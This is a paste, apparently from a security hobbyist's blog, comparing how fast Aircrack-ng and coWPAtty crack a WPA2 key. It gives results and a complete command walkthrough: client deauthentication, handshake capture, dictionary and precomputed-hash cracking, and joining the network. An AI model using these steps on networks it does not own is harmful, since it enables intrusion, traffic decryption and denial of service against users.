wpa2aircow


SUBMITTED BY: Guest

DATE: Dec. 6, 2013, 9:15 a.m.

FORMAT: Text only

SIZE: 3.8 kB

HITS: 707

  1. What is this?
  2. Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.
  3. It shows 4 different cracks, the time taken and speed of the crack (see results).
  4. > Aircrack-ng (Dictionary)
  5. > Aircrack-ng & airolib-ng (Pre-computed hashes)
  6. > coWPAtty (Dictionary)
  7. > coWPAtty & Genpmk (Pre-computed hashes)
  8. How does this work?
  9. To crack WPA/WPA2 PSK you need to capture a ‘Handshake’ . The best way to this packet the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the user).
  10. Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, its just a question of waiting to process the dictionary file.
  11. From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.
  12. If there isn't a connected client - you cant do this. If the network key isnt in the dictionary file - you cant do this.
  13. You can speed the the cracking process by creating pre-calculated hash files (see results - for how much faster!)
  14. Results
  15. Software Time (Seconds) Keys Per Second Pre Calculate Time (Seconds)
  16. AirCrack-ng 256.2 652.94 0
  17. AirCrack-ng + Airolib-ng 2 65685.4 1162.2
  18. Cowpatty 787.71 205.35 0
  19. Cowpatty + Genpmk 1.25 129715.92 1228.06
  20. AirCrack-ng & Airolib-ng 1164.2 65685.4 1162.2
  21. Cowpatty & Genpmk 1229.31 129715.92 1228.06
  22. The dictionary had 311141 lines (3.33M (3,499,543 bytes))
  23. The WPA key on line: 202762.
  24. Therefore it had to test 65.1% of the dictionary.
  25. Aircrack-ng is better with dictionary attack, whereas coWPAtty & Genpmk is better with Pre-computed hashes (also takes longer to calculate them!)
  26. What do I need?
  27. > Aircrack-ng suite
  28. > WiFi card that supports monitor mode
  29. > Big dictionary
  30. > Processing power
  31. Software
  32. Name: Aircrack-ng
  33. Version: 1.0-rc3
  34. Home Page: http://www.aircrack-ng.org/doku.php
  35. Download Link: http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz
  36. Name: coWPAtty
  37. Version: 4.3
  38. Home Page: http://www.willhackforsushi.com/Cowpatty.html
  39. Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz
  40. Commands:
  41. airmon-ng start wlan0
  42. airodump-ng mon0
  43. airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0
  44. aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
  45. aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt
  46. airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
  47. airolib-ng crackwpa --import essid essid
  48. airolib-ng crackwpa --stats
  49. airolib-ng crackwpa --clean all
  50. airolib-ng crackwpa --batch
  51. airolib-ng crackwpa --verify all
  52. aircrack -r crackwpa output-01.cap
  53. cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt
  54. genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
  55. cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash
  56. wpa_passphrase g0tmi1k precivilization > wpa.conf
  57. wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
  58. dhclient -r
  59. dhclient wlan0
  60. ping 192.168.1.1
  61. Notes:
  62. Song: First Sate - Off the Radar (First State's 808 Clash Mix)
  63. Video length: 08:38
  64. Capture length: 01:14:29
  65. Blog Post: http://g0tmi1k.blogspot.com/2010/02/video-cracking-wifi-wpawpa2-aircrack-ng.html

comments powered by Disqus